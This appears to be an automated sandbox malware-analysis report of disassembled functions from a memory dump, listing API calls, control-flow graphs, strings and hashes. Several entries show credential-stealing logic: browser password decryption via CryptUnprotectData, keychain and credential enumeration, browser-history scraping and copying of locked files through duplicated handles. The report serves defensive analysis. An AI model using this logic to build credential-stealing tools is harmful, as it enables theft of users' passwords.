                                                                                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                • API String ID: 2151808875-3798722523
                                                                                                                                                                • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                                                                • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                • API String ID: 2744995895-28296030
                                                                                                                                                                • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 393 40b6ef-40b741 call 44db70 memset call 409c70 wcsrchr 398 40b743 393->398 399 40b746-40b795 memset call 40b2cc call 409d1f call 409b98 393->399 398->399 406 40b7c5-40b815 call 40bb98 memset CreateFileW 399->406 407 40b797-40b7c2 call 409c70 call 40b2cc call 409d1f 399->407 413 40b837-40b838 FindCloseChangeNotification 406->413 414 40b817-40b835 call 409a45 CopyFileW 406->414 407->406 416 40b83e-40b87f memset call 40a6e6 call 444432 413->416 414->416 425 40bad5-40badc 416->425 426 40b885-40b8ac call 40b273 call 438552 416->426 428 40baeb-40baf7 call 40b04b 425->428 429 40bade-40bae5 DeleteFileW 425->429 435 40b8b2-40b8b8 call 4251c4 426->435 436 40bacd-40bad0 call 443d90 426->436 429->428 440 40babc-40bac0 435->440 436->425 441 40bac6-40bac8 call 424f26 440->441 442 40b8bd-40b9af memset call 425413 * 5 call 4253ef call 40b64c call 40a71b * 4 call 40a734 call 4253af call 4253cf 440->442 441->436 472 40ba92-40bab2 call 4099c6 call 4099f4 442->472 473 40b9b5-40b9c9 memcmp 442->473 483 40bab4-40baba call 4251c4 472->483 475 40bafa-40bb2a call 404423 473->475 476 40b9cf-40b9d7 473->476 475->472 484 40bb30-40bb3a 475->484 476->472 479 40b9dd-40ba25 call 447280 call 447960 476->479 479->472 492 40ba27-40ba7a call 40afe8 call 447920 call 4472c0 memcmp 479->492 483->440 487 40bb3c 484->487 488 40bb3e-40bb93 memset memcpy call 40a734 LocalFree 484->488 487->488 488->472 500 40ba7c-40ba8e call 40a734 492->500 501 40ba8f 492->501 500->501 501->472
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                • String ID: chp$v10
                                                                                                                                                                • API String ID: 580435826-2783969131
                                                                                                                                                                • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 505 40e2ab-40e2d5 call 40695d call 406b90 510 40e4a0-40e4af call 4069a3 505->510 511 40e2db-40e300 505->511 512 40e304-40e30f call 406e8f 511->512 516 40e314-40e316 512->516 517 40e476-40e483 call 406b53 516->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 516->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f ??3@YAXPAX@Z 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                • API String ID: 3073804840-2252543386
                                                                                                                                                                • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                                                                • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                • String ID: bhv
                                                                                                                                                                • API String ID: 327780389-2689659898
                                                                                                                                                                • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                • API String ID: 2941347001-70141382
                                                                                                                                                                • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                • String ID: visited:
                                                                                                                                                                • API String ID: 2470578098-1702587658
                                                                                                                                                                • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 722 40e175-40e1a1 call 40695d call 406b90 727 40e1a7-40e1e5 memset 722->727 728 40e299-40e2a8 call 4069a3 722->728 730 40e1e8-40e1f3 call 406e8f 727->730 733 40e1f8-40e1fa 730->733 734 40e270-40e27d call 406b53 733->734 735 40e1fc-40e219 call 40dd50 * 2 733->735 734->730 741 40e283-40e286 734->741 735->734 746 40e21b-40e21d 735->746 743 40e291-40e294 call 40aa04 741->743 744 40e288-40e290 ??3@YAXPAX@Z 741->744 743->728 744->743 746->734 747 40e21f-40e235 call 40742e 746->747 747->734 750 40e237-40e242 call 40aae3 747->750 750->734 753 40e244-40e26b _snwprintf call 40a8d0 750->753 753->734
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
